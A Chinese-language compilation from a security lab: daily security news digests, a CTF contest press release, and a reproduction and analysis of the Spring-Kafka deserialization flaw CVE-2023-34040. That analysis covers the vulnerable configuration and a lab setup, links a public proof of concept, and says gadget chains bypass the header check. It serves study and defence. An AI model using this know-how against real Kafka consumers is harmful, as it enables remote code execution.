1、“Looney Tunables”Glibc 漏洞在云攻击中被利用 https://www.securityweek.com/looney-tunables-glibc-vulnerability-exploited-in-cloud-attacks/ 最近在 GNU C 库 (glibc) 中修补的一个严重权限升级漏洞已被一个以使用 Kinsing 恶意软件及其加密劫持操作而闻名的威胁组织用于云攻击。 该安全漏洞编号为 CVE-2023-4911，名为Looney Tunables，已被发现影响主要 Linux 发行版，包括 Debian、Gentoo、Red Hat 和 Ubuntu。它允许本地攻击者以提升的权限执行任意代码。 2、微软表示 ZDI 披露的 Exchange“零日漏洞”已经修补或并不紧急 https://www.securityweek.com/microsoft-says-exchange-zero-days-disclosed-by-zdi-already-patched-or-not-urgent/ 微软表示，趋势科技零日计划 (ZDI) 上周披露的四个 Exchange 漏洞要么已经得到修补，要么不需要立即关注。 3、勒索软件攻击利用严重 Confluence 漏洞(CVE-2023-22518) https://securityaffairs.com/153732/security/confluence-flaw-ransomware-attacks.html 专家警告威胁行为者开始利用 Confluence 数据中心和 Confluence 服务器中最近的严重缺陷 CVE-2023-22518 4、QNAP 修复了 QTS 操作系统和应用程序中的两个严重漏洞 https://securityaffairs.com/153714/security/qnap-command-injection-flaws.html 中国台湾供应商 QNAP 警告其 NAS 设备上的 QTS 操作系统和应用程序存在两个严重的命令注入漏洞。 5、攻击者滥用 GOOGLE 日历服务作为 C2 基础设施 https://securityaffairs.com/153700/hacking/google-calendar-rat-attacks.html 谷歌警告多个威胁参与者正在利用其日历服务作为命令和控制（C2）基础设施。多个威胁参与者共享一个名为“Google Calendar RAT”的公共概念验证（PoC）漏洞，该漏洞依赖日历服务来托管命令和控制（C2）基础设施。 6、Okta 最近的客户支持数据泄露影响了 134 名客户 https://thehackernews.com/2023/11/oktas-recent-customer-support-data.html 身份和身份验证管理提供商 Okta 周五透露，最近的支持案例管理系统漏洞影响了其 18,400 名客户中的 134 名。 7、研究人员发现名为Socks5Systemz的代理僵尸网络 https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey 研究人员发现了一个由恶意软件PrivateLoader和Amadey传播的代理僵尸网络，这两个加载器经常被攻击者用来传播一种恶意软件并建立僵尸网络，研究人员将此种用于构建代理僵尸网络的恶意软件命名为Socks5Systemz。这个代理恶意软件并不是新发现的，在Twitter上最早可以追溯到2016年。研究人员发现了与这个恶意软件相关的几个服务器，以及一个Telegram用户，他通过利用这个代 8、北约在5G演习中试用“抗量子”加密 https://www.secrss.com/articles/60270 根据主办方提供的一份新闻稿，重点领域之一就是让演示者展示如何利用虚拟现实技术、安全的后量子加密技术和传感器融合技术提高指挥和控制能力。 9、全球近50个国家签署倡议：承诺永不向网络犯罪团伙支付赎金 https://www.secrss.com/articles/60249 在华盛顿特区举办的第三届国际反勒索软件倡议峰会上，近50个国家将签署有史以来首个联合反勒索软件倡议政策声明——其政府机构将停止向勒索软件团伙支付赎金。 10、Microsoft承诺加强安全性，作为“安全未来”计划的一部分 https://www.bleepingcomputer.com/news/microsoft/microsoft-pledges-to-bolster-security-as-part-of-secure-future-initiative/ Microsoft宣布了“安全未来计划”，承诺提高其产品和平台的内置安全性，以更好地保护客户免受不断升级的网络安全威胁。如果该公司兑现其承诺，这将通过解决眼前的问题并预测全球日益复杂的攻击带来的未来挑战来增强客户安全性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、BlackCat勒索团伙声称对医疗公司Henry Schein进行攻击 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-breach-of-healthcare-giant-henry-schein/ BlackCat勒索团伙（ALPHV）将医疗公司Henry Schein添加到其数据泄露网站的受害者名单中，声称他们侵入了该公司的网络，并窃取了35TB的敏感文件，包括工资数据和股东信息。该团伙称，由于谈判未能成功，正当Henry Schein几乎完成了所有系统的恢复工作时，他们再次加密了公司的设备。BlackCat勒索团伙在其数据泄露网站上删除了有关Henry S 2、HelloyKitty勒索软件利用Apache ActiveMQ漏洞进行攻击 https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/ HelloKitty勒索软件正在利用Apache ActiveMQ远程代码执行（RCE）漏洞来侵入网络并进行勒索攻击。该漏洞被标记为CVE-2023-46604，是一个高危（CVSS v3评分：10.0）的RCE漏洞，允许攻击者通过利用OpenWire协议中的序列化类类型执行任意shell命令。该漏洞在2023年10月25日的安全更新中得到解决，但研究人员于10月27日发现攻击者正在 3、墨西哥克雷塔罗洲际机场遭受网络攻击 https://therecord.media/queretaro-international-airport-mexico-cyberattack 墨西哥克雷塔罗国际机场证实遭受网络攻击，表示此次攻击可追溯到一名员工下载的包含恶意软件的文件，并称机场的运营安全没有受到损害，应急小组已经控制并隔离了这次攻击，而且已经与相关机构进行联系。LockBit勒索团伙宣称对此次事件负责，并威胁将在11月27日泄露数据。 4、思科修复其网络安全产品中的27个安全漏洞 https://www.securityweek.com/cisco-patches-27-vulnerabilities-in-network-security-products/ 思科发布了一系列软件更新，以解决自适应安全设备（ASA）、Firepower管理中心（FMC）和Firepower威胁防御（FTD）产品中的27个安全漏洞。其中最严重的漏洞是CVE-2023-20048（CVSS评分为9.9），这是FMC中的一个命令注入漏洞，由Web服务接口发送的配置命令的授权不足而引起。其中的8个中危漏洞可能导致拒绝服务、任意文件下载、SAML声明劫持、跨站脚本（XSS）攻击、策略绕过、检测 5、美国航空公司飞行员工会遭受勒索软件攻击 https://www.bleepingcomputer.com/news/security/american-airlines-pilot-union-hit-by-ransomware-attack/ 美国飞行员协会（APA）披露了发生在其系统中的勒索软件攻击事件。该工会在一份声明中表示，10月30日该工会经历了一起网络安全事件。尽管调查仍在进行中，但已经确定了这次事件是由于勒索软件引起的，某些系统已被加密。APA尚未透露在攻击中是否泄漏了飞行员的个人信息或受影响的个人数量。 6、研究人员发现WhatsApp的第三方恶意组件 https://securelist.com/spyware-whatsapp-mod/110984/ 研究人员在WhatsApp的修改版本中发现恶意组件。篡改的客户端清单包含了在原始WhatsApp客户端中找不到的可疑组件（一个服务和一个广播接收器）。广播接收器用以监听系统和其他应用程序的广播消息，例如手机开始充电、收到短信或下载器完成下载等。当接收器收到这样的消息时，它调用事件处理程序。在WhatsApp间谍修改版本中，接收器运行一个服务，当手机开机或开始充电时启动间谍模块。该服务会查看恶意软件代码中的Application_DM常量，以选择受感染设备将连接的命令和控制（C&C）服务器。 7、微软Exchange受到0day漏洞的影响 https://www.bleepingcomputer.com/news/microsoft/new-microsoft-exchange-zero-days-allow-rce-data-theft-attacks/ Microsoft Exchange受到四个零日漏洞的影响，攻击者可以远程利用这些漏洞来执行任意代码或泄露敏感信息。研究人员向微软报告了这些漏洞，尽管微软证实了这些漏洞，但其安全工程师认为这些漏洞不足以立即提供服务，因此推迟了修复。所有这些漏洞都需要进行身份验证才能被利用，这导致这些漏洞的CVSS评分可能介于7.1和7.5之间。此外，需要身份验证才能进行漏洞利用可能是微软没 8、新加坡公共卫生服务受到DDoS攻击 https://therecord.media/singapore-public-health-services-ddos-attack 一家监督新加坡公共卫生机构的健康技术机构Synapxe表示，黑客通过分布式拒绝服务（DDoS）攻击中断了新加坡公共卫生保健机构的互联网连接。新加坡所有公共卫生保健集群的互联网连接中断始于周三，持续约七个小时。在此期间，员工无法访问网站、电子邮件和生产工具等服务。DDoS攻击通过向网站发送垃圾互联网流量来阻止合法用户访问它们，该机构表示，目前没有证据表明公共卫生保健或患者数据以及内部网络已经遭受了侵犯。根据该机构的说法，对新加坡卫生保健机构的DDoS攻击仍在 9、时隔八年，通用漏洞评分系统标准CVSS v4.0正式发布 https://thehackernews.com/2023/11/first-announces-cvss-40-new.html 近日，事故响应与安全团队论坛（FIRST）正式发布了通用漏洞评分系统标准CVSS v4.0，这个全新版本距离上一版 CVSS v3.0 已经过去了八年。 10、LAZARUS通过新的KANDYKORN MACOS 恶意软件瞄准区块链工程师 https://securityaffairs.com/153622/hacking/lazarus-kandykorn-malware.html Lazarus 组织正在使用新的 KandyKorn macOS 恶意软件来攻击区块链工程师。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞描述 Spring Kafka 是 Spring Framework 生态系统中的一个模块，用于简化在 Spring 应用程序中集成 Apache Kafka 的过程，记录 (record) 指 Kafka 消息中的一条记录。 受影响版本中默认未对记录配置 ErrorHandlingDeserializer，当用户将容器属性 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 设置为 true(默认为 false)，并且允许不受信任的源发布到 Kafka 主题中时，攻击者可将恶意 payload 注入到 Kafka 主题中，当反序列化记录头时远程执行任意代码。 影响版本 2.8.1 <= Spring-Kafka <= 2.9.103.0.0 <= Spring-Kafka <= 3.0.9 漏洞复现 这一个漏洞所影响的组件其实是 Spring-Kafka，严格意义上来说并不算是 kafka 的漏洞，应该算是 Spring 的漏洞。 漏洞前置知识 先来看一看 SpringBoot 和 Kafka 是怎么完成通讯/消费的 工作流程如下 1、生产者将消息发送到 Kafka 集群中的某个 Broker（也可以是多个）2、Kafka 集群将消息存储在一个或多个分区中，并为每个分区维护一个偏移量3、消费者订阅一个或多个主题，并从 Kafka 集群中读取消息。4、消费者按顺序读取每个分区中的消息，并跟踪每个分区的偏移量。 ErrorHandlingDeserializer：是 Kafka中的一种反序列化器（Deserializer），它可以在反序列化过程中处理异常和错误。 checkDeserExWhenKeyNull && checkDeserExWhenValueNull：是 Kafka 中的一种序列化器（Serializer），它可以在序列化过程中检查键（key/value）是否为 null，并在发现值为 null 时抛出异常。 再简单整理一下漏洞条件 在受到影响的版本中，默认未对记录配置 ErrorHandlingDeserializer容器属性 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 设置为 true 环境搭建 其中需要我们起一个 Kafka 的服务，用来接收消息，本机上起比较麻烦，可以在 vps 上用 docker 迅速搭建，且需注意，Kafka 要能够接受外连，docker-compose.yml 如下 version: '2' services: zookeeper:   image: zookeeper   restart: always   ports:     - "2181:2181"   container_name: zookeeper kafka:   image: wurstmeister/kafka   restart: always   ports:     - "9092:9092"     - "9094:9094"   depends_on:     - zookeeper   environment:     KAFKA_ADVERTISED_HOST_NAME: 124.222.21.138     KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181     KAFKA_LISTENERS: PLAINTEXT://0.0.0.0:9092,SSL://0.0.0.0:9094     KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://124.222.21.138:9092,SSL://124.222.21.138:9094     KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,SSL:SSL     KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT   container_name: kafka Spring Kafka 的生产者和消费者可以通过使用 Spring Kafka 提供的 KafkaTemplate 和 `@KafkaListener 注解来编写。 生产者可以使用 KafkaTemplate 来发送消息到 Kafka 集群： package com.drunkbaby.springkafkatest.controller;     import com.drunkbaby.springkafkatest.common.KafkaInfo;   import org.springframework.beans.factory.annotation.Autowired;   import org.springframework.kafka.core.KafkaTemplate;   import org.springframework.kafka.support.SendResult;   import org.springframework.util.concurrent.ListenableFuture;   import org.springframework.web.bind.annotation.PostMapping;   import org.springframework.web.bind.annotation.RequestMapping;   import org.springframework.web.bind.annotation.RestController;     import java.time.LocalDateTime;   import java.util.concurrent.ExecutionException;     @RestController   @RequestMapping("/producer")   public class ProducerController {      @Autowired      private KafkaTemplate<String,String> kafkaTemplate;        @PostMapping("/fireAndForget")      public String fireAndForget() {          kafkaTemplate.send(KafkaInfo.TOPIC_WELCOME, "fireAndForget:" + LocalDateTime.now());          return "success";     }   } 消费者可以使用 @KafkaListener 注解来监听 Kafka 集群中的消息： package com.drunkbaby.springkafkatest.consumer;     import com.drunkbaby.springkafkatest.common.KafkaInfo;   import org.springframework.kafka.annotation.KafkaListener;   import org.springframework.messaging.MessageHeaders;   import org.springframework.messaging.handler.annotation.Headers;   import org.springframework.messaging.handler.annotation.Payload;   import org.springframework.stereotype.Component;     @Component   public class Consumer {      @KafkaListener(topics = KafkaInfo.TOPIC_WELCOME)      public String consumer2(@Payload String message, @Headers MessageHeaders headers) {          System.out.println("消费者(注解方式)：收到消息==> ");          System.out.println(" message：" + message);          System.out.println(" headers:");          headers.keySet().forEach(key -> System.out.println("   " + key + ":" + headers.get(key)));          return "success";     } 连接成功 访问 http://localhost:8083/producer/sync 发送一条记录 构造 payload 实际影响到的是 Consumer，且 Consumer 要设置 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 为 true ConcurrentKafkaListenerContainerFactory<String, Greeting> factory = new ConcurrentKafkaListenerContainerFactory<>();   factory.getContainerProperties().setCheckDeserExWhenValueNull(true);   factory.getContainerProperties().setCheckDeserExWhenKeyNull(true); payload 参考 https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040 漏洞分析 主要是来看反序列化的部分 断点会先走到 org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader 方法，它这里面会获取到 PoC 中的 KEY_DESERIALIZER_EXCEPTION_HEADER，并将其作为 headers 往下跟进 byteArrayToDeserializationException() 方法，这里就直接到反序列化的部分了，而在反序列化之前做了一次 resolveClass() 的校验。 而这里的 resolveClass() 校验是一次性的，这就代表我们可以构造其他的 Payload，如 CC 链等，证实是可以打通的 之后便会进入到对应类的 readObject() 方法 漏洞修复 https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d相当于把这里的 header 头加黑了

1、APT组织DoNot利用恶意软件监听受害者的VoIP通话 https://cyble.com/blog/donot-apt-expands-its-arsenal-to-spy-on-victims-voip-calls/ DoNot，又名APT-C-35，是一个自2016年以来活跃的APT组织。这个APT组织持续针对政府和军事组织、外交部和南亚国家的大使馆进行网络公攻击动活动，并已被观察到针对Windows和安卓平台进行攻击。研究人与近期发现了DoNot组织使用的新版本安卓恶意软件，可能针对印度克什米尔地区的用户。该组织利用了GitHub上的一个开源项目，并添加了恶意代码以进行拓展。新版本的恶意软件现在含有更多功能，如录制VoIP通话，从消息和社 2、攻击者利用Citrix Bleed漏洞进行攻击活动 https://www.mandiant.com/resources/blog/session-hijacking-citrix-cve-2023-4966 Citrix Bleed（CVE-2023-4966）漏洞于10月10日被披露，被认为是影响Citrix NetScaler ADC和NetScaler Gateway的严重漏洞，攻击者能够利用该漏洞访问设备上的敏感信息.攻击者正在利用Citrix Bleed（CVE-2023-4966）漏洞，针对美洲、欧洲、非洲和亚太地区的政府、技术和法律组织进行攻击。研究人员称，有四个正在进行的攻击活动针对易受攻击的Citrix NetScaler 3、研究人员发现数十个易受攻击的Windows驱动程序 https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html 研究人员发现数十个以前未知的易受攻击的内核驱动程序，这些驱动程序可能被攻击者用来更改固件或提升权限。研究人员使用Yara规则收集了大约18000个Windows驱动程序样本，在排除已知易受攻击的驱动程序后，研究人员识别出与34个独特的以前未知易受攻击的驱动程序相关的数百个文件哈希值，其中一些驱动程序属于主要的BIOS、PC和芯片制造商。研究人员向相关厂家进行了通报，但目前只有两家公司修复了漏洞。研究人员已经为一些易受攻击的驱动程序开 4、波音公司证实其零部件和分销业务受到网络攻击 https://www.theregister.com/2023/11/02/boeing_cyber_incident/ 在LockBit勒索团伙称从波音公司窃取了敏感数据的几天后，波音公司证实其遭受网络攻击。波音称，此次网络攻击事件没有影响飞行安全，并正在与相关机构协调调查此次事件。LockBit勒索团伙声称对这家航空巨头进行了网络攻击，将波音列为受害者之一，并给了该公司六天的时间进行谈判。该团伙称他们利用一种零日漏洞访问波音公司的系统。LockBit已从该网站中移除了波音，并表示这是因为他们开始与这家航空公司进行谈判。目前波音公司尚未发表事件的起因以及更多详细内容。 5、严重的 Apache ActiveMQ 漏洞被利用来传播勒索软件 https://www.securityweek.com/critical-apache-activemq-vulnerability-exploited-to-deliver-ransomware/ 最近修补的 Apache ActiveMQ 漏洞（编号为 CVE-2023-46604）正被用来传播勒索软件。CVE-2023-46604 已通过版本 5.15.16、5.16.7、5.17.6 和 5.18.3 的发布进行了修补，Apache ActiveMQ 用户应尽快安装这些版本。 6、思科修补网络安全产品中的 27 个漏洞 https://www.securityweek.com/cisco-patches-27-vulnerabilities-in-network-security-products/ 思科周三发布了软件更新，解决了自适应安全设备 (ASA)、Firepower 管理中心 (FMC) 和 Firepower 威胁防御 (FTD) 产品中总共 27 个漏洞。 7、被发现 117 个漏洞后，微软暂时禁用 SketchUp 支持 https://www.securityweek.com/microsoft-temporarily-disables-sketchup-support-after-discovery-of-117-vulnerabilities/ Zscaler 的 ThreatLabz 研究团队在 Microsoft 365 添加对 SketchUp (SKP) 文件的支持后，在 Microsoft 365 应用程序中发现了 117 个独特漏洞。 8、黑客正在利用 Citrix Bleed 漏洞攻击全球政府网络 https://www.freebuf.com/news/382563.html 黑客正在利用 "Citrix Bleed "漏洞（被追踪为 CVE-2023-4966）攻击美洲、欧洲、非洲和亚太地区的政府机构、技术和法律组织。 9、中国民航局回应“旅客信息泄露”：正编制文件加强数据保护 https://www.thepaper.cn/newsDetail_forward_25106423 近日，有网友呼吁严查旅客航班信息泄露及利用其诈骗问题，中国民用航空局在答复中表示，正在编制相关文件，进一步加强对重要数据的保护。 10、40个国家将承诺停止向勒索软件团伙支付赎金 https://www.bleepingcomputer.com/news/security/dozens-of-countries-will-pledge-to-stop-paying-ransomware-gangs/ 由 40 个国家组成的联盟将在华盛顿特区举行的第三届国际反勒索软件倡议年度峰会上签署承诺，停止支付网络犯罪组织索要的赎金。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、攻击者利用恶意的NuGet包传播恶意程序 https://www.reversinglabs.com/blog/iamreboot-malicious-nuget-packages-exploit-msbuild-loophole NuGet是一个开源软件包管理器和软件分发系统，使开发人员能够下载并为其项目包含现成的.NET库。研究人员于2023年10月15日发现了最新的NuGet恶意活动，该活动利用多种不同的软件包传播恶意软件。此次攻击活动的特别之处在于，这些软件包没有使用在安装脚本中包含下载程序的标准方法，而是利用NuGet的MSBuild集成来执行代码。研究人员称，早期的攻击活动使用PowerShell脚本从GitHub存储库 2、研究人员公开Wyze Cam v3设备RCE漏洞的PoC https://www.bleepingcomputer.com/news/security/rce-exploit-for-wyze-cam-v3-publicly-released-patch-now/ 一位安全研究人员发布了一个针对Wyze Cam v3设备漏洞的概念验证（PoC）代码，该漏洞允许攻击者接管易受攻击的设备。该研究员在最新的Wyze Cam v3固件中发现了两个漏洞，这两个漏洞能够被联合利用，从而在易受攻击的设备上远程执行代码。漏洞经过测试并确认可在固件版本4.36.10.4054、4.36.11.4679和4.36.11.5859上使用。Wyze发布了固件更新版本4.3 3、印度医学研究委员会泄露8.15亿印度人的相关数据 https://thecyberexpress.com/covid-data-leak-sourced-icmr-samples-verified 攻击者在黑客论坛中发布帖子，声称出售8.15亿印度人的新冠肺炎检测数据，数据来源于印度医学研究委员会（ICMR），其中包括姓名、电话号码、地址，以及护照信息和身份号码。该攻击者在黑客论坛中的用户名为pwn001，于2023年10月9日发布了出售印度新冠病毒检测数据的帖子，并在其中附上部分数据样本。一名分析员确认这些数据中含有真正的身份号码，并且印度相关机构已验证泄露数据的真实性。印度计算机应急小组（Cert-In）已就ICMR新冠病毒数据泄露的消 4、英国国家图书馆遭受网络攻击 https://www.bleepingcomputer.com/news/security/british-library-knocked-offline-by-weekend-cyberattack/ 10月28日，英国国家图书馆遭受网络攻击，此次事件影响了其系统，导致其网站和许多服务发生重大IT中断。持续的IT中断还影响了其他服务，包括电话线和现场图书馆服务。一位发言人称该图书馆正在国家网络安全中心（NCSC）和网络安全专家的支持下调查这起事件，但没有说明事件中属于客户或员工的个人或财务信息是否被窃取，也还未提供有关攻击性质以及攻击者如何破坏其系统的详细信息。 5、Meta 在欧洲推出付费无广告订阅以满足隐私法 https://thehackernews.com/2023/10/meta-launches-paid-ad-free-subscription.html Meta 周一宣布计划为欧盟 （EU）、欧洲经济区 （EEA） 和瑞士的用户提供访问 Facebook 和 Instagram 的无广告选项，以遵守该地区“不断发展”的数据保护法规。 6、俄罗斯黑客访问美司法部、国防部超过 600,000 名雇员的数据 https://thecyberexpress.com/us-federal-employees-data-breach/ 黑客利用 MOVEit 中的弱点渗透到美国联邦雇员数据系统中，导致未经授权访问敏感数据。 7、美国总统拜登签署白宫首个生成式AI监管规定 https://www.secrss.com/articles/60173 要求对人工智能进行新的安全评估、公平和民权指引，以及对劳动力市场影响的研究。 8、英国NCSC敲响警钟：78%学校遭受网络攻击 https://www.anquanke.com/post/id/291126 为了应对教育领域日益严重的网络安全威胁，英国国家网络安全中心（NCSC） 宣布启动一项新举措 ，旨在防止学校网络用户访问恶意网站。 9、国家安全部：数百个非法涉外气象探测站点向境外传输数据 https://www.secrss.com/articles/60171 今年以来，国家安全机关会同气象、保密等部门在全国范围内依法开展涉外气象探测专项治理，调查境外气象设备代理商10余家，检查涉外气象站点3000余个，发现数百个非法涉外气象探测站点实时向境外传输气象数据，广泛分布在全国20多个省份，对我国家安全造成风险隐患。 10、MITRE 发布 ATT&CK v14，改进了检测、ICS、移动设备相关内容 https://www.securityweek.com/mitre-releases-attck-v14-with-improvements-to-detections-ics-mobile/ MITRE 周二宣布发布 ATT&CK 第 14 版，这是广泛使用的对手战术和技术知识库。ATT&CK v14 带来了与检测、工业控制系统 (ICS) 和移动相关的改进。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

2023年10月22日，蚁景科技鼎力支持的中国刑事警察学院首届“蚁景杯”网络安全技术竞赛拉开帷幕，中国刑事警察学院的精英们齐聚一堂，共同参与本次竞赛。10月29日，随着决赛各奖项结果出炉，本次竞赛圆满落幕。 本次竞赛由中国刑事警察学院公信学院、教务处及学生处主办，中国刑事警察学院网络监察教研室承办，湖南蚁景科技有限公司协办。作为一次以实践和应用为主的竞赛，本次活动旨在通过比赛的形式，提高在校师生的网络安全技能和意识，增强网络安全领域的综合素质。蚁景科技本着“以赛促训”理念，与校方共同积极推动人才培养方案与模式的改革。 比赛采用国际常见的CTF夺旗赛模式，涵盖了Web、Pwn、Crypto、Misc、Reverse五大方向，吸引了200多名学院师生参与。 在竞赛过程中，200多名参赛师生经过初赛的激烈角逐，最终有80余人取得优异成绩，成功晋级决赛。决赛中，参赛选手们展示了卓越的技术实力，呈现了一场精彩的竞技盛宴。决赛采用线下攻防对抗的形式，在蚁景科技的技术加持下，比赛现场大屏展示比赛实时战况。看实况，调战略！让大家见证了同空间、同时间内的不同战略巅峰对决。 蚁景科技为本次竞赛提供强有力的技术支持，并为比赛提供了丰厚的奖品，彰显了其对网络安全人才培养的重视和对中国刑事警察学院首届“蚁景杯”网络安全技术竞赛的全力支撑。 通过本次竞赛不仅展现了中国刑事警察学院在网络安全技术领域的实力，也促进了学生们的专业技能提升和团队合作精神增强。 本次竞赛采用的是蚁景科技自主研发的“网安竞赛平台”，该平台面向网络安全比赛，支持攻防对抗赛、竞速赛、夺旗赛等多种形式的赛事。平台针对每一种赛事提供丰富的比赛场景、题目和态势展示方案，用户可以根据自己的需要，选择场景、题目，配置比赛方案，部署比赛环境，用于比赛。同时，该竞赛平台也支持赛事的二次定制化开发，用于满足用户特定赛事需求。 蚁景科技凭借多年深耕网络安全行业的经验，为CTF赛事提供专业可靠的网安竞赛平台支撑服务。未来，期待能与更多的业内单位、高校开展合作。

1、亲哈马斯黑客组织使用新型Linux擦除器攻击以色列 https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group 根据报道，亲哈马斯的黑客组织在以色列和哈马斯之间的战争期间，使用一种名为BiBi-Linux Wiper的新型Linux擦除器恶意软件，针对以色列的一些目标进行攻击。这种恶意软件是一个x64 ELF可执行文件，没有混淆或保护措施。它允许攻击者指定目标文件夹，并且如果以root权限运行，可能会破坏整个操作系统。研究人员自愿协助以色列公司应对战争危机，在取证调查过程中，发现了这种新型Linux擦除器恶意软件， 2、黑客利用GitHub窃取AWS密钥进行加密挖矿 https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/ 据报道，研究人员发现了一场持续多年的加密挖矿活动，该活动被命名为“EleKtra-Leak”。该活动的黑客能够自动克隆GitHub仓库，并窃取其中暴露的AWS密钥。研究人员称，黑客通常在AWS密钥在GitHub仓库中暴露后的五分钟内就能够获取它们，并在多个区域尽可能多地启动Amazon EC2实例来挖掘Monero。在8月30日至10月6日的一个多月时间里，研究人员发现了474个不同的挖矿程序，它们可能由黑客控 3、激活Microsoft应用程序方法可实现DCOM Excel横向移动 https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 研究人员介绍了一种有趣的横向移动技术，即利用分布式组件对象模型(DCOM)Excel应用程序中的ActivateMicrosoftApp ()方法。DCOM是微软的一种解决方案，允许软件组件远程通信。COM对象必须在客户端和服务器端正确配置，Windows注册表存储了DCOM配置数据，包括类标识符(CLSID)、程序标识符(ProgID)和应用程序标识符(AppID)。客户端通过提供CLSID、 4、黑客利用Slack重定向功能诱导用户点击恶意链接 https://www.esentire.com/blog/the-wiki-slack-attack Wiki-Slack攻击是一种新型的网络钓鱼攻击，它利用了Slack平台的一个特性，即允许用户创建重定向链接，即以slack-redir.net为域名的链接，当用户点击这些链接时，会被重定向到目标网站。黑客可以通过在Slack上发送包含恶意网站的重定向链接来诱导用户点击，从而窃取用户的敏感信息或者安装恶意软件。这种攻击的危险性在于，用户可能会认为这些链接是来自Slack官方或者可信任的来源，而不会怀疑其真实性。而且，由于Slack平台广泛用于企业和组织的内部沟通，这种攻击可能会影响大量的用 5、RansomedVC勒索软件团伙宣布退出并出售其基础设施 https://www.hackread.com/ransomedvc-ransomware-quit-sell-infrastructure/ RansomedVC是一个2023年8月份出现的勒索软件团伙，它声称自己是为了揭露违反欧盟一般数据保护条例(GDPR)的企业而进行渗透测试，但实际上是为了敲诈受害者的钱财。该团伙曾声称侵入了索尼、NTT Docomo等大型日本企业，并在暗网上出售窃取的数据。然而，最近该团伙在其暗网站上发布了一则声明，称他们已经退出勒索软件行业，并将其基础设施(包括暗网网站、数据泄露站、加密器、解密器等)以比特币出售给感兴趣的买家。该团伙没有透露退出的原因，也没有提 6、Pwn2Own 大会落幕，三星多次被攻破，苹果和谷歌躲过一劫 https://www.bleepingcomputer.com/news/security/hackers-earn-over-1-million-for-58-zero-days-at-pwn2own-toronto/ Pwn2Own 多伦多 2023 黑客大赛落下帷幕，参赛团队在为期 3 天的比赛时间里，针对消费类产品进行了 58 次零日漏洞利用（以及多次漏洞碰撞），共获得了 103.85 万美元的奖金。 7、研究发现基于 XMPP 协议的社交软件面临严重窃听风险 https://thehackernews.com/2023/10/researchers-uncover-wiretapping-of-xmpp.html 一名安全研究人员声称他发现有人试图利用托管在德国 Hetzner和Linode（Akamai 的子公司）的服务器，秘密拦截来自基于 XMPP 的即时消息服务 jabber[.]ru（又名xmpp[.]ru）的流量。 8、Lazarus APT利用已知漏洞攻击软件供应商 https://www.anquanke.com/post/id/291090 Lazarus 集团被认为是一场新活动的幕后黑手，在该活动中，一家未透露姓名的软件供应商通过利用另一款备受瞩目的软件中的已知安全漏洞而受到损害。 9、HackerOne 已向白帽支付了超 3 亿美元漏洞赏金 https://www.bleepingcomputer.com/news/security/hackerone-paid-ethical-hackers-over-300-million-in-bug-bounties/ 知名网络安全公司 HackerOne 宣布，自 2012 年成立以来，其漏洞赏金计划已向白帽和漏洞研究人员发放了超 3 亿美元的奖励。 10、F5 修复了BIG-IP 身份验证绕过漏洞，允许远程代码执行攻击 https://www.bleepingcomputer.com/news/security/f5-fixes-big-ip-auth-bypass-allowing-remote-code-execution-attacks/ F5 BIG-IP 配置实用程序中存在一个严重漏洞（编号为 CVE-2023-46747），允许远程访问配置实用程序的攻击者执行未经身份验证的远程代码执行。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

